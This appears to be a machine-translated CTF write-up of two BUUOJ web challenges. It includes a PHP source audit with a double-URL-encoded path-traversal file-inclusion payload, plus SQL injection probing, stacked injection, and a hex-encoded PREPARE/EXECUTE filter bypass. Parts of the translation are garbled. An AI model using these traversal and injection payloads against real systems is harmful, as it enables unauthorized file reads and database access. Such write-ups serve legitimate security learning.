High quality buu oj exam questions here about the record
1.WarmUp
Code audit
View source findings suggest source.php and hint.php
source.php
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
hint prompt flag in ffffllllaaaagggg.php in, where you can think of a question that is SUCTF phpmyadmin Remote File Inclusion Vulnerabilities
checkfile function source.php the working principle is as follows
1. Define a white list, which includes source.php and hint.php
2. A page is determined whether or empty string, returns true.
3. The page parameters of the data before the question mark, determines whether the input is in the whitelist, if present in the white list, returns true after one page url encoded incoming removed.
Of course, if it's passed parameter, the server will automatically conduct a url encoded. So our most total payload is hint.php? Page = .. / .. / .. / .. / .. / .. / ffffllllaaaagggg once before decoding becomes hint.php? Page =% 3f ../ .. /../../ ffffllllaaaagggg then goes through a codingfile=hint.php%253f/../../../../../../../../ffffllllaaaagggg
payload:http://web5.buuoj.cn/?file=hint.php%253F/../../../../ffffllllaaaagggg
2. casually Note
This is the cup of a strong network of the original title.
Been to test
Input 1 'error
Input 1 'or 1 = 1 # returned to normal
Input 1 'order by ... # 2 found
1' union select 1,2,3,4 # 返回 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
See the filtering rules, filtering the select update other commonly used characters
A stacked injection newly learned
Desc structural show and collect the table.
1 '; show databases; # View database
1 '; show tables; # see the data sheet
Followed by the query field
1';show columns from `表`;#
Table here to add anti-quotation marks, because here to distinguish between table_name
Find the flag field
But there is here substr, so a way to bypass the case: payload: http: //web16.buuoj.cn/ inject = 1% 27; SeT @ a = 0x73656c656374202a2066726f6d20603139313938313039333131313435313460; prepare% 20execsql% 20from% 20 @ a; execute? % 20execsql; #